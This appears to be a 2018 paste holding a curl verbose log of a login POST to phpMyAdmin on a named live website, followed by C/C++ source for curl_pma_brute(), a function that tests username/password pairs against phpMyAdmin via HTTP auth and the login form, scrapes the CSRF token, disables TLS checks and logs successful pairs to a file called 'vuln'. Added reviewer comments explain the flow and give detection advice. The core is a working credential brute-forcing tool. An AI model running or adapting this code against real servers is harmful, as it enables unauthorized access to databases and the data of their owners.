
Untitled

a guest
Sep 18th, 2018
  1. > POST /phpMyAdmin-4.0.10.20-english/index.php HTTP/1.1
  2. Host: gangbangebony.com
  3. User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0
  4. Accept: */*
  5. Cookie: phpMyAdmin=n17vf2r3rc532vvpqkmhua4hh7; pma_lang=en; __cfduid=d68021a412017ac69cee2890ea0b1e4371537310970
  6. Content-Length: 107
  7. Content-Type: application/x-www-form-urlencoded
  8.  
  9. * upload completely sent off: 107 out of 107 bytes
  10. < HTTP/1.1 302 Found
  11. < Date: Tue, 18 Sep 2018 22:49:36 GMT
  12. < Content-Type: text/html; charset=UTF-8
  13. < Transfer-Encoding: chunked
  14. < Connection: keep-alive
  15. < Expires: Thu, 19 Nov 1981 08:52:00 GMT
  16. < Cache-Control: private, max-age=10800
  17. < Last-Modified: Wed, 29 Mar 2017 01:03:24 GMT
  18. * Added cookie pmaUser-1="%7B%22iv%22%3A%22Df2rfm2qxuyQAB72T94Ofw%3D%3D%22%2C%22mac%22%3A%226f210573fbb3eac515408aa1f8494c31058caedc%22%2C%22payload%22%3A%226e92Bq1dmn0Wqb3v9WmKYg%3D%3D%22%7D" for domain gangbangebony.com, path /phpMyAdmin-4.0.10.20-english/, expire 1539893577
  19. < Set-Cookie: pmaUser-1=%7B%22iv%22%3A%22Df2rfm2qxuyQAB72T94Ofw%3D%3D%22%2C%22mac%22%3A%226f210573fbb3eac515408aa1f8494c31058caedc%22%2C%22payload%22%3A%226e92Bq1dmn0Wqb3v9WmKYg%3D%3D%22%7D; expires=Thu, 18-Oct-2018 22:49:35 GMT; Max-Age=2592000; path=/phpMyAdmin-4.0.10.20-english/; HttpOnly
  20. * Added cookie pmaAuth-1="%7B%22iv%22%3A%221eErqOJZ3Hnh1uCuZaHZxQ%3D%3D%22%2C%22mac%22%3A%22f7e8be1ef302580aa119ec92e92f79e89176e033%22%2C%22payload%22%3A%220SgFKBMEBJg7DznBj8%5C%2FR8gL6eXVvGxzDYyKOCRVMuhlQQexB80iuDXewqNoan9Tc%22%7D" for domain gangbangebony.com, path /phpMyAdmin-4.0.10.20-english/, expire 0
  21. < Set-Cookie: pmaAuth-1=%7B%22iv%22%3A%221eErqOJZ3Hnh1uCuZaHZxQ%3D%3D%22%2C%22mac%22%3A%22f7e8be1ef302580aa119ec92e92f79e89176e033%22%2C%22payload%22%3A%220SgFKBMEBJg7DznBj8%5C%2FR8gL6eXVvGxzDYyKOCRVMuhlQQexB80iuDXewqNoan9Tc%22%7D; path=/phpMyAdmin-4.0.10.20-english/; HttpOnly
  22. < X-ob_mode: 0
  23. < Location: https://gangbangebony.com:80/phpMyAdmin-4.0.10.20-english/index.php?token=c91128b32c2eba468c76105237a238d8
  24. < Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
  25. < Server: cloudflare
  26. < CF-RAY: 45c75dd93b019cb9-AMS
  27. <
  28. * Ignoring the response-body
  29. * Connection #0 to host gangbangebony.com left intact
  30. * Issue another request to this URL: 'https://gangbangebony.com:80/phpMyAdmin-4.0.10.20-english/index.php?token=c91128b32c2eba468c76105237a238d8'
  31. * Switch from POST to GET
  32. * Found bundle for host gangbangebony.com: 0x1decdc0 [can pipeline]
  33. * Trying 104.27.153.115...
  34. * TCP_NODELAY set
  35. * Connected to gangbangebony.com (104.27.153.115) port 80 (#1)
  36. * ALPN, offering http/1.1
  37. * Cipher selection: ALL:!EXPORT:!EXPORT40:!EXPORT56:!aNULL:!LOW:!RC4:@STRENGTH
  38. * successfully set certificate verify locations:
  39. * CAfile: /etc/ssl/certs/ca-certificates.crt
  40. CApath: none
  41. * error:1408F10B:SSL routines:ssl3_get_record:wrong version number
  42. * Closing connection 1
  43. curl_easy_perform() failed: SSL connect error
  44. RES1=[0]
  45.  
  46.  
  47.  
  48.  
  49.  
  // Review note: curl_pma_brute() tests one username/password pair against a
  // phpMyAdmin URL and returns 1 if the pair is accepted, 0 otherwise.
  //
  // Flow, as visible in this listing:
  //   1. Request `url` with the pair configured as HTTP authentication
  //      (CURLOPT_HTTPAUTH = CURLAUTH_ANY, CURLOPT_USERPWD = "user:pass").
  //   2. If the reply holds "HTTP/1.1 200 OK" and the pmahomme logo path, the
  //      pair is treated as valid.
  //   3. Otherwise, if the reply is the login form (pma_username / pma_password
  //      fields), a value is cut out after name="token" and the form is POSTed
  //      with the same pair; the same two markers decide success.
  // A hit is recorded as "url:user:pass\n" via file_put_contents("vuln", ...).
  //
  // Parameters: url = page to request, user / pass = credential pair under
  // test, debug_curl = verbosity; values >= 3 enable CURLOPT_VERBOSE and print
  // the replies.
  //
  // timeout, USERAGENT, struct MemoryStruct, WriteMemoryCallback and
  // file_put_contents are not defined in this listing.
  //
  // Defender's view: per credential pair the server sees a request for the
  // login page followed by a form POST carrying pma_username, pma_password,
  // server=1 and token. Presumably this is called in a loop over a word list
  // (caller not shown), so many such pairs from one client in a short time is
  // the log pattern to alert on. Keeping phpMyAdmin off the public internet and
  // throttling failed logins both limit this class of traffic.
  50. int curl_pma_brute(char* url, char* user, char* pass, int debug_curl)
  51. {
  52. /*
  53. curl_version_info_data *d = curl_version_info(CURLVERSION_NOW);
  54. puts(d->version);
  55. puts(d->libssh_version);
  56. puts(d->ssl_version);
  57. exit(0);
  58. */
  59.  
  60. int result = 0; // 1 once a reply matches the "logged in" markers below
  61. CURL *curl_handle;
  62. CURLcode res;
  63.  
  64. struct MemoryStruct chunk; // receives the reply through WriteMemoryCallback
  65. char* curl_error;
  66. struct curl_slist *chunk_headers = NULL; // only used by the commented-out Host-header code
  67. char chunk_temp[4096];
  68.  
  69. curl_global_init(CURL_GLOBAL_ALL);
  70. chunk.memory = (char*) malloc(1);
  71. chunk.size = 0;
  72.  
  73. // CURL1
  74. curl_handle = curl_easy_init();
  75. curl_easy_setopt(curl_handle, CURLOPT_URL, url);
  76. curl_easy_setopt(curl_handle, CURLOPT_FOLLOWLOCATION, 1L); // caused problems
  77.  
  78. curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, timeout);
  79. curl_easy_setopt(curl_handle, CURLOPT_CONNECTTIMEOUT, timeout);
  80.  
  81. curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
  82. curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&chunk);
  83.  
  84. curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,USERAGENT);
  85. // curl_easy_setopt(curl_handle, CURLOPT_CONNECT_TO,host);
  86.  
  87. /*
  88. memset(chunk_temp,0,sizeof(chunk_temp));
  89. sprintf(chunk_temp,"Host: %s",original_host);
  90. chunk_headers = curl_slist_append(chunk_headers, chunk_temp);
  91. curl_easy_setopt(curl_handle, CURLOPT_HTTPHEADER, chunk_headers);
  92. */
  93.  
  94. curl_easy_setopt(curl_handle, CURLOPT_HEADER, 1l); // reply headers are delivered with the body, so the status line can be matched with strstr below
  95.  
  // TLS host-name and certificate verification are both switched off here.
  96. curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYHOST, 0l);
  97. curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYPEER,0l);
  98. // curl_easy_setopt(curl_handle, CURLOPT_USE_SSL, 0l);
  99. // curl_easy_setopt(curl_handle, CURLOPT_SSLVERSION, CURL_SSLVERSION_MAX_TLSv1_2);
  100. // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST,"RC4-SHA");
  101. // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST, "TLSv1");
  102.  
  103. curl_easy_setopt(curl_handle, CURLOPT_COOKIEFILE, ""); // empty file name: enables libcurl's in-memory cookie engine
  104.  
  105. if(debug_curl >=3) curl_easy_setopt(curl_handle, CURLOPT_VERBOSE, 1);
  106.  
  107. // curl_easy_setopt(curl_handle, CURLOPT_FAILONERROR, 1L);
  108. // curl_easy_setopt(curl_handle, CURLOPT_UPLOAD, 1L);
  109. char user_pass[500];
  110. memset(user_pass,0,sizeof(user_pass));
  111. sprintf(user_pass,"%s:%s",user,pass); // "user:pass" form expected by CURLOPT_USERPWD
  112.  
  113. curl_easy_setopt(curl_handle, CURLOPT_HTTPAUTH, CURLAUTH_ANY);
  114. curl_easy_setopt(curl_handle, CURLOPT_USERPWD,user_pass);
  115.  
  116. // [redacted by reviewer: the original comment held a plaintext username:password pair and a target URL]
  117. // [redacted by reviewer: the original comment held a manual curl command line embedding the same credential pair and host]
  118.  
  119. res = curl_easy_perform(curl_handle);
  120.  
  121. if(res != CURLE_OK)
  122. {
  123. curl_error = (char*) curl_easy_strerror(res);
  124.  
  125. if(debug_curl >=3) fprintf(stderr, "curl_easy_perform() failed: %s\n",curl_error);
  126. }
  127. else
  128. {
  129. if(debug_curl >=3) printf("%lu bytes retrieved\n", (long)chunk.size);
  130.  
  131. if(debug_curl >=3) puts(chunk.memory);
  132.  
  // Success test: a 200 status line plus the pmahomme theme logo path in the reply.
  133. if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"themes/pmahomme/img/logo_left.png"))
  134. {
  135. result = 1;
  136.  
  137. char temp_filename_line[500];
  138. memset(temp_filename_line,0,500);
  139. sprintf(temp_filename_line,"%s:%s:%s\n",url,user,pass);
  140. file_put_contents("vuln",temp_filename_line,"FILE_APPEND"); // helper not shown; presumably appends the line to the file "vuln"
  141. }
  142.  
  143.  
  // Login-form case: the reply is a 200 page containing both credential fields.
  144. else if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"name=\"pma_username\"") && strstr(chunk.memory,"name=\"pma_password\""))
  145. {
  146. std::string s1(chunk.memory);
  147. string delimiter1 = "name=\"token\"";
  148. string token1 = s1.substr(52, s1.find(delimiter1)); // token is "scott"
  149. token1 = s1.substr(s1.find(delimiter1)+20,32); // 32 characters starting 20 bytes after name="token"; presumably the hidden field's value, which depends on the exact page markup
  150.  
  151. // it is a box, post it
  152. curl_easy_setopt(curl_handle, CURLOPT_URL, url);
  153. curl_easy_setopt(curl_handle, CURLOPT_FOLLOWLOCATION, 1L); // caused problems
  154.  
  155. curl_easy_setopt(curl_handle, CURLOPT_TIMEOUT, timeout);
  156. curl_easy_setopt(curl_handle, CURLOPT_CONNECTTIMEOUT, timeout);
  157.  
  158. curl_easy_setopt(curl_handle, CURLOPT_WRITEFUNCTION, WriteMemoryCallback);
  159. curl_easy_setopt(curl_handle, CURLOPT_WRITEDATA, (void *)&chunk);
  160.  
  161. curl_easy_setopt(curl_handle, CURLOPT_USERAGENT,USERAGENT);
  162. // curl_easy_setopt(curl_handle, CURLOPT_CONNECT_TO,host);
  163.  
  164. curl_easy_setopt(curl_handle, CURLOPT_HEADER, 1l);
  165.  
  166. curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYHOST, 0l);
  167. curl_easy_setopt(curl_handle, CURLOPT_SSL_VERIFYPEER,0l);
  168. // curl_easy_setopt(curl_handle, CURLOPT_USE_SSL, 0l);
  169. // curl_easy_setopt(curl_handle, CURLOPT_SSLVERSION, CURL_SSLVERSION_MAX_TLSv1_2);
  170. // curl_easy_setopt(curl_handle, CURLOPT_SSL_CIPHER_LIST, "TLSv1");
  171.  
  172.  
  173. curl_easy_setopt(curl_handle, CURLOPT_COOKIEFILE, "");
  174.  
  // Form body for the login POST: the credential pair, server=1 and the extracted token.
  175. char post_string[500];
  176. memset(post_string,0,500);
  177. sprintf(post_string,"pma_username=%s&pma_password=%s&server=%s&token=%s",user,pass,"1",token1.c_str());
  178.  
  179. curl_easy_setopt(curl_handle,CURLOPT_POSTFIELDS,post_string); // setting POSTFIELDS makes the next transfer a POST
  180.  
  181. if(debug_curl >=3) curl_easy_setopt(curl_handle, CURLOPT_VERBOSE, 1);
  182.  
  183. res = curl_easy_perform(curl_handle);
  184.  
  185. if(res != CURLE_OK)
  186. {
  187. curl_error = (char*) curl_easy_strerror(res);
  188.  
  189. if(debug_curl >=3) fprintf(stderr, "curl_easy_perform() failed: %s\n",curl_error);
  190. }
  191. else
  192. {
  193. if(debug_curl >=3) printf("%lu bytes retrieved\n", (long)chunk.size);
  194.  
  195. if(debug_curl >=3) puts(chunk.memory);
  196.  
  // Same success markers as for the first request.
  197. if(strstr(chunk.memory,"HTTP/1.1 200 OK") && strstr(chunk.memory,"themes/pmahomme/img/logo_left.png"))
  198. {
  199. result = 1;
  200.  
  201. char temp_filename_line[500];
  202. memset(temp_filename_line,0,500);
  203. sprintf(temp_filename_line,"%s:%s:%s\n",url,user,pass);
  204. file_put_contents("vuln",temp_filename_line,"FILE_APPEND");
  205. }
  206.  
  207. }
  208. }
  209.  
  210.  
  211.  
  212. }
  213.  
  // Teardown: release the easy handle, the reply buffer and libcurl's global state.
  214. curl_easy_cleanup(curl_handle);
  215.  
  216. free(chunk.memory);
  217.  
  218. curl_global_cleanup();
  219.  
  220. return result;
  221. }